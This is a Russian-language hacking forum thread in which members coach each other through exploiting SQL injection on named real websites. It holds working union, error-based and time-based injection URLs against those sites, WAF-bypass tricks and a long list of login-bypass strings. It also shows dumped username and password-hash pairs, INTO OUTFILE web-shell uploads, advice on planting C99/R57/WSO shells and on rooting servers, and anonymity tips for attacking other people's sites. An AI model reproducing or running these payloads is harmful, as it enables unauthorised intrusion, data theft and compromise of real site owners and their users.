Тогда у меня к тебе 2 вопроса :

1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?

2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?

Действительно не знаю )

Vladislav88 said:
Тогда у меня к тебе 2 вопроса :
1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?
2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?
Действительно не знаю )


1)впн

2)localhost

p.s.

екс говорил же не осилит

А если я буду использовать бесплатный впн то меня тоже не поймают на левых сайтах? Приятней на ком то потренироваться в реале , а не на себе )

Vladislav88 said:
Тогда у меня к тебе 2 вопроса :
1)Как хакеры ломают сайты и даже выкладывают видео со взломом и у них нет проблем?
2) Свой сайт нужно залить на сервер в интернете или достаточно открыть его у себя на компе и для того чтобы испробовать xss на себе у меня на сайте обязан быть javascript?
Действительно не знаю )


1) Использует связку для анонимности:

VPN+SSH+Socks+DNS+Proxy+VPSProxy+DoubleVPN+TripleV PN+QuadroVPN осилишь?

2) Скачай Denwer, на компе достаточно. Для тренировки юзай php-скрипт, который вешает куки + имеет поле без всякой фильтрации.

3) А ты думай, что бесплатный VPN предоставляет милиция. Все вопросы отпадут

Ну и гипер связка . Такое наверное только со временем. Я не думал даже что для левых сайтов надо так шифроваться.

Тогда буду на своем сайте тренироваться. Спасибо всем за помощь.

Vladislav88, учится нужно локально.

Если же хочешь приступить к боевой практике, на форуме куча статей и тем про анонимность.

Данная тема посвящена вопросам про УЯЗВИМОСТИ, а не собственную БЕЗОПАСНОСТЬ. Вопрос закрыт!

такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?

поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.

GC0mmander said:
такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?
поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.


нет нельзя..если бы было можно тогда раздел по бруту хешей не нужен был бы..заменял бы своим и все..и если собрался менять хеш то и соль ставь туда ...

GC0mmander said:
такой вопрос, возможно ли через sql инъекцию изменить хэш админа vbulletin?
поскольку используется salt, не понятно, будет ли внесенный мной пароль верным при авторизации.


Можно, если есть соотвецтвующие права на изминения данных в бд через update

получил доступ к сайту от админа,через сайт залил шелл, "ваш файл успешно загружен"

блин теперь не могу найти шелл((

winstrool said:
Можно, если есть соотвецтвующие права на изминения данных в бд через update


допустим есть права, как сменишь хеш если там иньекция в селект запросе?

winstrool said:
Можно, если есть соотвецтвующие права на изминения данных в бд через update


Права чего, права кого, права куда? )

В селект запросе на мускуле это сделать невозможно (а булки стоят на мускуле)

В апдейт запросе не нужны никакие "права", если скрипт что-то апдейтит, то права у него есть, разумеется

НО Скрипт должен апдейтить в базу юзеов булки, что-бы была возможность изменить там что-то + скуль должна быть довольно специфической что-бы удалось сменить хеш. Скрипты самой булки таких багов не имеют, сомневаюсь что есть какие то модули, которые имеют такие баги.

Тоесть должен быть какой-то кривой самописный скрипт, работающий с таблицей юзеров, и имеющий скуль в апдейте + куча условий, что невероятно, или скрипт имеющий скуль в апдейте в tbl_name, что ещё менее вероятно.

Тоесть ответ - нет, с вероятностью 99.99%

Konqi said:
как сменишь хеш если там иньекция в селект запросе


Про селект ты сам придумал. В вопросе такого не было.

KolosJey, а в инсерте?

M_script said:
KolosJey
, а в инсерте?


Ровно тоже самое что и в апдейте. Так что врядли )

M_script said:
Про селект ты сам придумал. В вопросе такого не было.


большинство людей под SQL injection подразумевают SQLi именно в select запросе, чтобы не заблуждать человека задающего вопрос нужно было добавить что данный способ работает только в апдейт запросах

http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345

как такое крутить? дальше and 1=2, не ушел...

vaddd said:
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345
как такое крутить? дальше and 1=2, не ушел...


/threadedpost1826253.html

не ибейс , но синтаксис похож..почитай..может пригодится

Gorev said:
/threadedpost1826253.html
не ибейс , но синтаксис похож..почитай..может пригодится


order by чета не работает ((( вроде же айбэйс, ошибки характерные присутствуют

хелп, чёт никак не могу разкрутить


PHP:
http://titancup.ru/user/?id=11+union+select+1--+

qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+





http://titancup.ru/user/?id=11+or+(1,1)=(select+count(0),concat((select+ve rsion()+from+information_schema.tables+limit+0,1), floor(rand(0)*2))from(information_schema.tables)+g roup+by+2)--+

стандартный метод не пробовал, но error based катит

qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+







Code:
http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,c oncat%28%28select+user%28%29%29,floor%28rand%280%2 9*2%29%29x+from+information_schema.tables+group+by +x%29a%29--1


upd: Konqi опередил)

qaz said:
хелп, чёт никак не могу разкрутить

PHP:
http://titancup.ru/user/?id=11+union+select+1--+





ts_manager_users

Daven:b7838c7f83d8197f3e46b5d88e3d5a6c

White:0d9198487f4ad5fb4407ee44b84df42c

demiurg:c16bb5217e34563e2eb9af2d9edabb6c

помойму админы

бле

опередили

Приветствую.

В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101

Это является sql иньекцией? И можно что-то с этим сделать?

JorryGo said:
Приветствую.
В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101
Это является sql иньекцией? И можно что-то с этим сделать?


Пробуй обойти авторизацию так:

admin' --

admin' #

admin'/*

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

Есть такой кусок кода


PHP:
// Check IP From IP Logging Database

$get_voted_aids=$wpdb->get_col("SELECT pollip_aid FROM$wpdb->pollsipWHERE pollip_qid =$poll_idAND pollip_ip� �= '".get_ipaddress()."'$log_expiry_sql");



в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ?

Уважаемые гуру,

Есть код, где _GET, _POST и _COOKIE "фильтруются" так:


PHP:
$_POST=security($_POST);

$_GET=security($_GET);

$_COOKIE=security($_COOKIE);




Функция сукурити:


PHP:
functionsecurity($value)

{

if (is_array($value)) {

$value=array_map('security',$value);

}else{

if(!get_magic_quotes_gpc() ) {

$value=htmlspecialchars($value,ENT_QUOTES,'UTF-8');

}else{

$value=htmlspecialchars(stripslashes($value),ENT_Q UOTES,'UTF-8');

}

$value=str_replace("\\","\\\\",$value);

}

return$value;

}



htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?

Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?

htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?


Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого


PHP:
$get="SELECT * FROM `test` WHERE `id`=$id";



Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях.

По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя

Sql-inj такого типа раскучиваются или они не поддаются?

_http://www.afr.ru/region/303'/ob/

er9j6@ said:
Sql-inj такого типа раскучиваются или они не поддаются?
_http://www.afr.ru/region/303'/ob/


Скобки юзай:

http://www.afr.ru/region/(303)and(1)=(0) false

http://www.afr.ru/region/(303)and(1)=(1) true

Ereee said:
Скобки юзай:
http://www.afr.ru/region/(303)and(1)=(0) false
http://www.afr.ru/region/(303)and(1)=(1) true


Это я тоже знаю.

и, дальше как?

er9j6@ said:
Это я тоже знаю.
и, дальше как?


http://www.afr.ru/region/(303)and(1)=(1)union(select(1),2,3)#

и т.д.

Ereee said:
http://www.afr.ru/region/(303)and(1)=(1)union(select(1),2,3)#
и т.д.


как версию БД тут вывести?

er9j6@ said:
как версию БД тут вывести?


@@version

Lilo said:
@@version


http://www.afr.ru/region/(303)and(1)=(0)union(select(@@version),@@version,@ @version)#

Не могу найти вывод.

er9j6@ said:
http://www.afr.ru/region/(303)and(1)=(0)union(select(@@version),@@version,@ @version)#
Не могу найти вывод.


Блин... Сначал найди кол-во:

http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3)#

http://www.afr.ru/region/(303)and(1)=(0)union(select(1),2,3,4)#

и т.д. пока не исчезнет ошибка...

1 and extractvalue(rand(),concat(0x3a,(select concat(char(58),user_id,char(58),username,char(58) ,user_password) from phpbb_users limit 1001,1)))--

подскажите прогу чтоб сдампить таблицу, стоит форум phpbb

p3d said:
1 and extractvalue(rand(),concat(0x3a,(select concat(char(58),user_id,char(58),username,char(58) ,user_password) from phpbb_users limit 1001,1)))--
подскажите прогу чтоб сдампить таблицу, стоит форум phpbb


https://rdot.org/forum/showthread.php?t=519

там окончание лимит нужно, а тут скобки

p3d said:
там окончание лимит нужно, а тут скобки


https://rdot.org/forum/showthread.php?t=1142 попробуй этим.

p3d said:
там окончание лимит нужно, а тут скобки


Не надо, там новая версия лежить, с новыми возможностями!

Code:
http://ogra.org.pk/cats_disp.php?cat=-172

It has 8 order by.

I cannot get tables.

It's WAF and I've tried all my WAF skills.

lightangel said:

Code:
http://ogra.org.pk/cats_disp.php?cat=-172

It has 8 order by.
I cannot get tables.
It's WAF and I've tried all my WAF skills.


http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,version(),7,8--+

Sorry, I mean tables and not the version.

I already had the version.

http://ogra.org.pk//cats_disp.php?cat=-20+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8/**//*!from*//**/information_schema.%60tables%60--+

=\

http://www.traktora.com.ua/subcat.php?sort=1

Можно что-то выжать?

shadowrun said:
http://www.traktora.com.ua/subcat.php?sort=1
Можно что-то выжать?


можно, но из другого скрипта:

http://www.traktora.com.ua/catalog.php?cat=-2+union+select+version()--

d1v said:
можно, но из другого скрипта:
http://www.traktora.com.ua/catalog.php?cat=-2+union+select+version()--


Спасибо!

MSSQL INJ


-12+union+select+@@version--


дает ответ


Microsoft SQL Native Client error '80040e14'
The ntext data type cannot be selected as DISTINCT because it is not comparable.


Возможно ли обойти DISTINCT в инъекции путем конверта или еще как то?

Спасибо

jangle said:
MSSQL INJ
дает ответ
Возможно ли обойти
DISTINCT
в инъекции путем конверта или еще как то?
Спасибо


Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))

залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?

DyukiN said:
залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?


Возможно сайты на другом сервере. Т.е. у тебя остались старые версии сайтов. Попробуй сделать что-то типа 123.txt, если не находит, то возможно я прав.

заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)

DyukiN said:
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)


Попробуй править уже существующие файлы, добавь например:

Посмотри из веба, если в исходнике есть данная строка, то я хз че сказать

походу у меня остались страые версии сайтов(( что то можно извлечь из этого?

DyukiN said:
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?


Пароли админов. Пути к админке, потом можно залить на те сайты шеллы, без всякого хакинга

UPD. Mожет это из-за группы и овнера?

Ereee said:
Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))


а можно поподробнее на примере


-12+union+select+@@version--


как можно сделать что-бы @@VERSION выводилось?

http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,concat_ws(0x3a,id_member, member_name,real_name,passwd,email_address),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+smf_members--+

как быть?

Все просто, таблицы smf_members нет в текущей бд, она находиться в другой


Code:
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,table_schema,6,7,8,%209,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,%20 26,27,28+from+information_schema.tables+where+tabl e_name=0x736d665f6d656d62657273+--+

jangle said:
а можно поподробнее на примере
как можно сделать что-бы @@VERSION выводилось?


-12+union+select+CONVERT(nvarchar,@@version)--

не?

Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу


PHP:
http://www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+conc at_ws(0x3a,name,email,password)+from+batterika_mys ql.p_users+limit+1,1),0x00,floor(rand(0)*2))having +min(0)+or+1--+

qaz said:
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу

PHP:
http://www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+conc at_ws(0x3a,name,email,password)+from+batterika_mys ql.p_users+limit+1,1),0x00,floor(rand(0)*2))having +min(0)+or+1--+



http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+

таблица пуста

Konqi said:
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста


ППц

если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???

qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???


Обязательно они там должны быть? может это админ такой хитрый.

P.S: а сам редактирует сайт через cpanel (я так думаю)

qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???


Возможно пароль админа хранится в config.php/admin.php/settings.php/etc. Как вариант, возможно, что скрипты для авторизации/регистрации подключены к другой БД. Вообщем сейчас посмотрю...

UPD. Смотрим админку

http://www.pitatel.ru/admin/


Code:
Access denied for user 'batterika'@'localhost' (using password: NO)

Нет коннекта. Смотрим текст:


Code:
C 14 июля 2011 года компания Pitatel вошла в группу компаний "Баттерика"!

Соответственно, сайт заброшен. БД с пассами админки не подключена...

qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???



table_rows в помощь

http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+

я так понял, тут нет прямого вывода?

smirk said:
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?




Code:
http://er-region.ru/about/department/index.php?id=13999999999999.9+and(select+1+from(se lect+count(*),concat((select+table_name+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+f

Все выводится через error-based. Смотрим исходник:


Code:
[Duplicate entry 'COLLATIONS1' for key 'group_key']

---

иньекция в запросе вида

SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]

есть у кого идеи как ее можно раскрутить?

метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...

eD"]
[R]eD said:
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...


Error-based, не?

Ereee said:
Error-based, не?


вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?

eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?


UNION не работает кстати после ORDER BY.

Единственное, что я вижу, что можно попробовать, это


Code:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''

Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off

Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.

Крутить как-то так:


Code:
, 100


UPD


Code:
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));

SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));

Ток если записей много, то лучше юзать LIMIT.

Что-то по типу blind sleep-based sql injection

можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.

CMS WP


If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.

AlonDelon said:
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP


Инглиш бро. Криво установлено все.

Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?

_http://1cnews.com/index.php?mode=search&sstring='and(select*from(select(name_const(version (),1)),name_const(version(),1))a)and'

er9j6@ said:
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(select(name_const(version (),1)),name_const(version(),1))a)and'




Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f

В title 5.1.33-log

Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто

Ereee said:

Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f

В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто


как ты количество полей подобрал, каким запросом?

er9j6@ said:
как ты количество полей подобрал, каким запросом?


Тут главное внимательность.

http://1cnews.com/index.php?mode=viewpart&part=10

Делаем запрос:

http://1cnews.com/index.php?mode=viewpart&part=10'

В заголовке исчезает "Events of the branch". Что то тут не так

Проверяем на inj.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1

"Events of the branch" появился. А если:

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2

Исчез. Соответственно, true и false.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+10--+f

Заголовок исчез.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f

Пояивлся, соответственно, кол-во 3.

Ну а дальше

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+select+1,2,3--+f

403 forbidden

Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/

Пробуем

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f

Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.

P.S. Вообщем контент-based injection

Есть доступ к бд как залить shell ?

Groove said:
Есть доступ к бд как залить shell ?


Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php

Ereee said:
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php


У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat

Groove said:
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat


Ты про это наверно:


PHP:
select '' into outfile '/path/to/www/dir/file.php'

народ, подобрал колонки, и проблема возникла из-за редиректа, как быть дальше?


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+or+1=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45--+

Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам

Cennarios said:
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+use r%28%29%29,floor%28rand%280%29*2%29%29%20having%20 min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам


я так пробовал, когда начинаю выводить данне из таблицы


PHP:
http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+concat_ws(0x3a ,email,password)+from+stroitel.acx_users+limit+$i, 1),0x00,floor(rand(0)*2))having+min(0)+or+1--+

возникает тотже редирект

Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл


Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45--+

имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:

но он появляется в соурсе:

http://rghost.ru/35730570/image.png

и соответственно index.php?a=phpinfo()

не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры

qaz said:
возникает тотже редирект


На будущее, если что то не выводится или перенаправляет, пробуй в Opere:

Чтобы отключить авторедирект:

Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Интернет(или Сеть, просто у меня EN Opera) => Сними галочку "Включить автоматическое перенаправление"

Чтобы отключить Javascript:

Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Скрипты(Сценарий) => Сними галочку "Включить скрипты(Javascript)"

В Firefox:

Настройки => Дополнительно => Общие => "Предупреждать при попытке сайта перенаправить или перезагрузить страницу"

Еще в твоем случаи mq=on, поэтому не получится через Error-based думаю, так как думаю, что нужно вставить кавычку, дабы вызвать ошибку. Возможно я и не прав.


BLurpi^_^ said:
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда:

но он появляется в соурсе:
http://rghost.ru/35730570/image.png
и соответственно index.php?a=phpinfo()
не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры


Это значит, что не выполняется php(впрочем везде так). Второй вопрос не подробный. Попробуй найти в админке файлменеджеры, аплоадеры и т.д.

Столкнулся с проблемой

есть скуля

&ordtype=name&ord=,sleep(IF(ASCII(substr((select+1+from+user),1, 1))=123,1,0))

проблема в том что скрипт переводит таблицу user в верхний регистр USER и в итоге

Invalid query: Table 'db.USER' doesn't exist

пробывал

&ordtype=тфьу&ord=,sleep(IF(ASCII(substr((set+@@global.lower_cas e_table_names=1),1,1))=123,1,0))

но ошибка

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET @@GLOBAL.LOWER_CASE_TABLE_NAMES=1),10,1))=48,1,0)) ' at line 9

как можно обойти перевод в верхний регистр или заставить поменять системную переменную?

и еще раз тут есть вывод ошибок то наверное можно выводить через error-based но не выходит(

upd:

с error-based разобрадся. получилось


Code:
&ordtype=name&ord=,(select+1+from+information_schema.tables+grou p+by+concat((select+1),floor(rand(0)*2))+having+mi n(0))

, но так и не могу обойти перевод в верхний регистр(

eD"]
[R]eD said:
Но так и не могу обойти перевод в верхний регистр(


unhex(hex()) не? По логике должно сработать.

Ereee said:
unhex(hex()) не? По логике должно сработать.


он переводит имя таблицы в верхний регистр а не сам запрос т.е.

select password from USER

с unhex(hex(user)) такое не прокатит.

вродебы где-то была метод с переводом всего запроса в mysql-hex и его выполнением в подзадпросе, но не могу найти(

[R]eD,

адресом сайта поделись. И попробуй функцию LOWER(tvoi_text).

А => set+@@global.lower_case_table_names=1 думаю вообще бред.

Есть папка phpmyadmin где мне найти данные всех баз которые к ней подключены ?

Groove said:
Есть папка phpmyadmin где мне найти данные всех баз которые к ней подключены ?


Groove

phpmyadmin всего лишь ИНТЕРФЕЙС для удобной работы с MySQL, о каких данных идет речь? оно подключается к тем базам к которым данный пользователь mysql иммет доступ

Просто есть машина на которой стоит хостинг и там папка phpmyadmin через которую я захожу в mysql но я думал что я смог бы узнать и другие созданные базы на этой машине /

Groove said:
То есть phpmyadmin всего лишь интерфейс для работы с mysql ?




Wiki said:
phpMyAdmin — веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL


кажется ты немного не правильно понимаешь о чем говорю..

phpmyadmin всего лишь посредник, он у себя данные не хранит, имена баз или структура баз, тебе нужно залогинится в него, чтобы увидеть то что доступно твоему пользователю mysql


Groove said:
Просто есть машина на которой стоит хостинг и там папка phpmyadmin через которую я захожу в mysql но я думал что я смог бы узнать и другие созданные базы на этой машине /



не можешь, в папке phpmyadmin ничего стоящего нету, грубо говоря

Еще вопрос , можно через shell узнать права ftp или сделать себе ?

Groove said:
Еще вопрос , можно через shell узнать права ftp или сделать себе ?


большинство фтп серверов используют данные системных пользователей для авторизации, только маленькая часть работает через базу, если у вас первый вариант, то нужны рут права для добавления/редактирования пользователей

Groove said:
Еще вопрос , можно через shell узнать права ftp или сделать себе ?


Если ядро старое или есть файл с root/user, то можно получить права рута и сделать фтп. Некоторые хостинги хранят .passwd, .shadow рядом с папкой www(т.е. доступна из под текущего юзера). Можешь эти пароли на FTP попробовать.

P.S. Shell есть, зачем тебе FTP?

Ereee said:
Если ядро старое или есть файл с root/user, то можно получить права рута и сделать фтп. Некоторые хостинги хранят .passwd, .shadow рядом с папкой www(т.е. доступна из под текущего юзера). Можешь эти пароли на FTP попробовать.
P.S. Shell есть, зачем тебе FTP?



На некоторых папка стоит ограничение прав , через шелл я не могу изменить , а мне нужно скачать целый движок .

Посоветуй реально работающий сканер sql дорков. Sql Poizon уже давно отказывается работать с Google official.

2Groove,

рутай.


jecka3000 said:
Посоветуй реально работающий сканер sql дорков. Sql Poizon уже давно отказывается работать с Google official.


Вопрос задан не правильно. Если хочешь просканировать спарсенные сайты, то NetdevilZ пробуй. Если хочешь спрасить, то юзай этот (http://www.wisecat.ru/programmy-i-skripty/svobodnye/parser-google-vydachi-besplatnyi) софт.

jecka3000, http://grabberz.com/showthread.php?t=30960

Не могу понять в чем дело

заливаю обычный (любой) скрипт на сайт - все ок,

заливаю wso2 шелл - пустая страница

sl1k said:
Не могу понять в чем дело
заливаю обычный (любой) скрипт на сайт - все ок,
заливаю wso2 шелл - пустая страница


Залей другой шелл. Думаю проблема в шелле

Например C99 или R57

помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку

pirat0 said:
помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку


Там что правиться? просто новость в WORD'e? правка шаблона есть?

aydin-ka said:
Там что правиться? просто новость в WORD'e? правка шаблона есть?


извини чувак, но ничего не понял из выше написаного

obnovi-soft[antigoogle].ru/software'

Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.

aydin-ka said:
Залей другой шелл. Думаю проблема в шелле
Например C99 или R57


